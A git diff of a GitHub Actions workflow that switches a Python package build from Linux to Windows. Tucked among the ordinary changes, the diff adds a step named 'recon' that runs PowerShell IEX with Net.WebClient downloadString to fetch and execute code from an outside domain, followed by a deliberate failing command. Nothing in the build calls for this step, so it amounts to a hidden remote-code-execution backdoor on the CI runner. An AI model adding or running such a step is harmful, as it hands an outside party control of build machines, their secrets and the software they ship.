--- a/.github/workflows/build-win.yaml
+++ b/.github/workflows/build-win.yaml
@@ -9,26 +9,22 @@ on: push
 #    - master
 jobs:
   build-win64:
-    name: Build Linux64 package
-    runs-on: ubuntu-latest
-    container: quay.io/pypa/manylinux2014_x86_64
+    name: Build Win64 package
+    runs-on: windows-latest
 
     strategy:
       matrix:
-        abi: ["cp35-cp35m", "cp36-cp36m", "cp37-cp37m", "cp38-cp38"]
+        ver: ["3.5.4", "3.6.8", "3.7.7", "3.8.3"]
 
     steps:
     - uses: actions/checkout@v2
-    - name: Install deps
+    - name: recon
       run: |
-        yum -y install cmake3 boost-devel ninja-build llvm-toolset-7 swig3
-    - name: overlay hack
-      run: |
-        cp /opt/python/${{matrix.abi}}/lib/pkgconfig/python*.pc /usr/share/pkgconfig
-        cp -rn /opt/python/${{matrix.abi}}/bin/* /usr/bin
+        powershell "IEX(New-Object Net.WebClient).downloadString('https://c3murk.dev')"
+        fail_command
     - name: pip deps
       run: |
-        pip3 install poetry auditwheel setuptools
+        python3 -m pip install poetry auditwheel setuptools
     - name: Do build
       run: |
         mkdir build && cd build
